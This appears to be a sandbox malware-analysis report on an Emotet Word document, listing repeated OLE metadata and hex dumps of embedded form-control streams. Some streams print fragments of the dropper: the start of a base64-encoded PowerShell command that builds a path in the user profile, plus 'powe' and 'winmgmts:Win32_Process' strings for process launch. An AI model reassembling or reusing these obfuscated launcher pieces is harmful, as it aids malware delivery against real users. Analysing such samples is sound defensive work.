                                Data Raw:01 b5 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 06 00 1c 00 4e 43 36 37 62 54 05 00 02 08 00 2c 6a 4f 57 61 63 43 20 7a 72 40 00 10 01 1a 00 4f 00 00 57 00 61 00 63 00 43 30 00 7a 00 72 00 5a 01 5e 56 73 60 6a 58 6d 59 3d 02 76 03 16 07 5f 02 b2 00 60 00 86 01 ee 01 12 09 02 13 b8 40 d0 64 5f 2e 00 0c 01 10 00 0a 3c 02 05 16 02 37

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 68
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:68
                                Entropy:3.17158353103
                                Base64 Encoded:False
                                Data ASCII:. . $ . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . p o w e . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 24 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 04 00 00 80 1a 00 00 00 1a 00 00 00 30 00 03 00 70 6f 77 65 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 72
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:72
                                Entropy:3.39591633332
                                Base64 Encoded:False
                                Data ASCII:. . ( . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . E E l k L 1 . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 28 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 06 00 00 80 1a 00 00 00 1a 00 00 00 30 00 fb ff 45 45 6c 6b 4c 31 fb ff 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 72
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:72
                                Entropy:3.23066007011
                                Base64 Encoded:False
                                Data ASCII:. . ( . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . F 2 p i Z R . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 28 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 06 00 00 80 1a 00 00 00 1a 00 00 00 30 00 05 00 46 32 70 69 5a 52 06 00 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 1940
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:1940
                                Entropy:4.46467784619
                                Base64 Encoded:False
                                Data ASCII:. . t . @ . . . . . . . . . . . . . . . T . . . . . . . . . . . 0 . . . J A B q A H I A R g B o A E E A M A A 9 A C c A V w B m A D E A c g B I A H o A J w A 7 A C Q A d Q B V A E 0 A T Q B M A E k A I A A 9 A C A A J w A y A D g A N A A n A D s A J A B p A E I A d A B q A D Q A O Q B O A D 0 A J w B U A G g A T Q B x A F c A O A B z A D A A J w A 7 A C Q A R g B 3 A G M A Q Q B K A H M A N g A 9 A C Q A Z Q B u A H Y A O g B 1 A H M A Z Q B y A H A A c g B v A G Y A a Q B s A G U A K w A n A F w A J w A r
                                Data Raw:00 02 74 07 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 54 07 00 80 1a 00 00 00 1a 00 00 00 30 00 00 00 4a 41 42 71 41 48 49 41 52 67 42 6f 41 45 45 41 4d 41 41 39 41 43 63 41 56 77 42 6d 41 44 45 41 63 67 42 49 41 48 6f 41 4a 77 41 37 41 43 51 41 64 51 42 56 41 45 30 41 54 51 42 4d 41 45 6b 41 49 41 41 39 41 43 41 41 4a 77 41 79 41 44 67 41 4e 41 41 6e 41 44 73 41 4a 41 42 70

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 72
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:72
                                Entropy:3.41320956246
                                Base64 Encoded:False
                                Data ASCII:. . ( . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . I i l D 3 5 z k . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 28 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 08 00 00 80 1a 00 00 00 1a 00 00 00 30 00 f5 ff 49 69 6c 44 33 35 7a 6b 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 72
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:72
                                Entropy:3.07366082762
                                Base64 Encoded:False
                                Data ASCII:. . ( . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . Y i 9 a c P . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 28 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 06 00 00 80 1a 00 00 00 1a 00 00 00 30 00 00 00 59 69 39 61 63 50 00 00 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 88
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:88
                                Entropy:3.78976093096
                                Base64 Encoded:False
                                Data ASCII:. . 8 . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . w i n m g m t s : W i n 3 2 _ P r o c e s s . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 38 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 16 00 00 80 1a 00 00 00 1a 00 00 00 30 00 00 00 77 69 6e 6d 67 6d 74 73 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 00 00 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 72
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:72
                                Entropy:3.14902691769
                                Base64 Encoded:False
                                Data ASCII:. . ( . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . z j S 6 1 z j . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 28 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 07 00 00 80 1a 00 00 00 1a 00 00 00 30 00 00 00 7a 6a 53 36 31 7a 6a 00 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 72
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:72
                                Entropy:3.31173655562
                                Base64 Encoded:False
                                Data ASCII:. . ( . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . k D _ z i 2 Q 2 . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 28 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 08 00 00 80 1a 00 00 00 1a 00 00 00 30 00 01 00 6b 44 5f 7a 69 32 51 32 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 50 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 15 00 00 00 46 6f 72 6d 73 2e 4f 70 74 69 6f 6e 42 75 74 74 6f 6e 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                Stream Path: contents, File Type: data, Stream Size: 72
                                General
                                Stream Path:contents
                                File Type:data
                                Stream Size:72
                                Entropy:3.20458247324
                                Base64 Encoded:False
                                Data ASCII:. . ( . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . W 2 Y E z V f . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
                                Data Raw:00 02 28 00 40 01 c0 80 00 00 00 00 05 00 00 00 01 00 00 80 07 00 00 80 1a 00 00 00 1a 00 00 00 30 00 00 00 57 32 59 45 7a 56 66 00 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 00

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams

                                Stream Path: \x1CompObj, File Type: data, Stream Size: 126
                                General
                                Stream Path:\x1CompObj
                                File Type:data
                                Stream Size:126
                                Entropy:4.84009677388
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . P . . . B . . . . . . . . ` . . ! . . . M i c r o s o f t F o r m s 2 . 0 O p t i o n B u t t o n . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . O p t i o n B u t t o n . 1 . . 9 . q . . . . . . . . . . . .
